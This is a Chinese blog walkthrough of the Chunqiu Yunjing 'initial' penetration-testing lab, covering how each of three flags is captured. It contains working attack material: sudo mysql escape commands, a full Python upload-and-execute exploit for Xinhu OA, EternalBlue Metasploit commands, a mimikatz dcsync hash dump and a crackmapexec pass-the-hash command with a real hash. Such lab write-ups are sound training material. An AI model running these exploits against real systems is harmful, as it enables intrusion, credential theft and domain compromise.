首页 > 其他分享 >【内网渗透】最保姆级的春秋云镜initial打靶笔记

【内网渗透】最保姆级的春秋云镜initial打靶笔记

时间:2024-08-20 18:57:55浏览次数:13  
标签:url initial 打靶 云镜 提权 flag session php 172.22

目录

flag1

flag2

flag3 


flag1

外网thinkphp服务 

随便找个工具梭

连蚁剑

读/root目录要提权

suid没有可利用的提权命令,打sudo提权

sudo -l

mysql的sudo提权 

Linux提权之Sudo 70种提权方法 - 简单安全

 查看文件名带flag的文件

sudo mysql -e '\! find / -type f -name '*flag*' 2>/dev/null'

读文件

sudo mysql -e '\! cat /root/flag/flag01.txt'

拿到第一个flag,提示下一个flag在内网服务器 

flag{60b53231-

flag2

 msf反弹shell

上传fscan扫内网

 https://github.com/shadow1ng/fscan/releases

172.22.1.2   DC域控
172.22.1.21  MS17-010永恒之蓝
172.22.1.18  信呼OA系统

先打信呼0A

frp内网穿透

vps上先起一个frps

./frps -c frps.ini

再在靶机上起一个frpc

先上传或者wget下载frpc和frpc.ini

./frpc -c frpc.ini

本机电脑配一下Proxifier

然后就能直接浏览器里访问内网服务

现成exp梭了 

import requests


session = requests.session()

url_pre = 'http://url/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'

data1 = {
    'rempass': '0',
    'jmpass': 'false',
    'device': '1625884034525',
    'ltype': '0',
    'adminuser': 'dGVzdA::',
    'adminpass': 'YWJjMTIz',
    'yanzm': ''
}


r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})

filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']

url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'

r = session.get(url3)

先给蚁剑配置socks5代理

蚁剑连http://172.22.1.18/upload/2024-08/20_17073585.php拿到flag2

flag02: 2ce3-4813-87d4-

最后提示我们去打DC

flag3 

在打DC前先打172.22.1.21 MS17-010永恒之蓝

这个一般直接拿kali的msf打就行

先给msf所在机配一下socks5代理

vim /etc/proxychains4.conf

proxychains4 msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
exploit

成功正向连接

永恒之蓝打了之后本身就是SYSTEM权限,可以mimikatz搜集域内用户hash

load kiwi
kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv

 

再用crackmapexec打PTH拿下域控

proxychains crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"

 拿到flag3

flag03: e8f88d0d43d6}

标签:url,initial,打靶,云镜,提权,flag,session,php,172.22
From: https://blog.csdn.net/uuzeray/article/details/141316323

相关文章

  • 春秋云镜 Brute4Road
    先用fscan扫一下内网尝试打redis主从python3redis-rogue-server.py--rhost39.98.122.75--lhost123.57.23.40需要在vps下使用,选择r,然后输入要反弹的ip,port使用pty获得交互式shellpython-c'importpty;pty.spawn("/bin/bash")'尝试UID提权find/-userroot-......
  • 打靶记录15——Ripper
    靶机:https://www.vulnhub.com/entry/ripper-1,706/KaliIP地址:192.168.0.102靶机IP地址:192.168.0.103VirtualBox设置为桥接模式难度:低->中目标:取得root权限+2Flag涉及攻击方法:主机发现端口扫描Web信息收集内部系统泄露代码审计备份文件泄密Webmin漏洞利......
  • Windows Sandbox failed to initialize. Error 0x80370106
    #报错提示之前都好好的突然打开WindowsSandbox出现上面提示,经过网上搜索,我的版本是24H2(OSBuild26120.1252) #尝试更新到最新版本  ......
  • 春秋云镜 time
    先用fscan扫一下,得到了下面的端口挨个尝试,访问7473发现是个neo4j的服务.这个neo4j的server只出现过这一个历史漏洞我们在网上下载jar漏洞利用文件,然后在本地运行.注意:一定是要java8,同时反弹shell的时候要使用编码防止传输中出现错误运行命令java-jar.\rhino_gadget......
  • 打靶记录12——Fawkes
    靶机:https://download.vulnhub.com/harrypotter/Fawkes.ova这是个哈利波特系列的靶机,作者和本人都非常喜欢这个系列,因为它的漏洞和利用点都设计得很巧妙。难度:高目标:取得2个root权限+3个flag涉及攻击方法:主机发现端口扫描Web信息收集FTP服务攻击缓冲区溢出......
  • 打靶记录11——Billu_b0x
    靶机:https://download.vulnhub.com/billu/Billu_b0x.zip难度:中(两种攻击路线)目标:取得root权限涉及的攻击方法:主机发现端口扫描Web信息收集SQL注入(Sqlmap跑不出来)文件包含漏洞文件上传漏洞源码审计内核漏洞提权注意:选择包含所有网卡的MAC地址,就能正常获取IP......
  • 春秋云镜 tsclient
    入口机给了个ip首先用fscan扫一下看看发现存在mysql远程登录,弱口令都扫出来了.使用MDUT进行远程登录登录以后上传cs马,选(s)这个.注意要上传到C:/Users/Public/,因为public文件夹通常有写的权限然后执行命令C:/Users/Public/beacon.exe回到cs中成功得到shell调整休眠时......
  • 打靶记录10——hacksudo---Thor
    靶机:https://download.vulnhub.com/hacksudo/hacksudo---Thor.zip难度:中目标:取得root权限+flag涉及攻击方法:主机发现端口扫描Web目录爬取开源源码泄露默认账号密码SQL注入破壳漏洞GTFOBins提权主机发现:sudoarp-scan-l端口扫描和服务发现sudonmap-p-......
  • 打靶记录9——Vikings
    靶机下载地址:https://www.vulnhub.com/entry/vikings-1,741/难度:低(中),CTF风格的靶机目标:取得root权限+2个flag涉及的攻击方法:主机发现端口扫描Web信息收集编码转换/文件还原离线密码破解隐写术二进制文件提取素数查找/科拉茨猜想RPC漏洞提权主机发现:sudoarp-sc......
  • 打靶记录9——Vikings
    靶机下载地址:https://www.vulnhub.com/entry/vikings-1,741/难度:低(中),CTF风格的靶机目标:取得root权限+2个flag涉及的攻击方法:主机发现端口扫描Web信息收集编码转换/文件还原离线密码破解隐写术二进制文件提取素数查找/科拉茨猜想RPC漏洞提权主机发现:sud......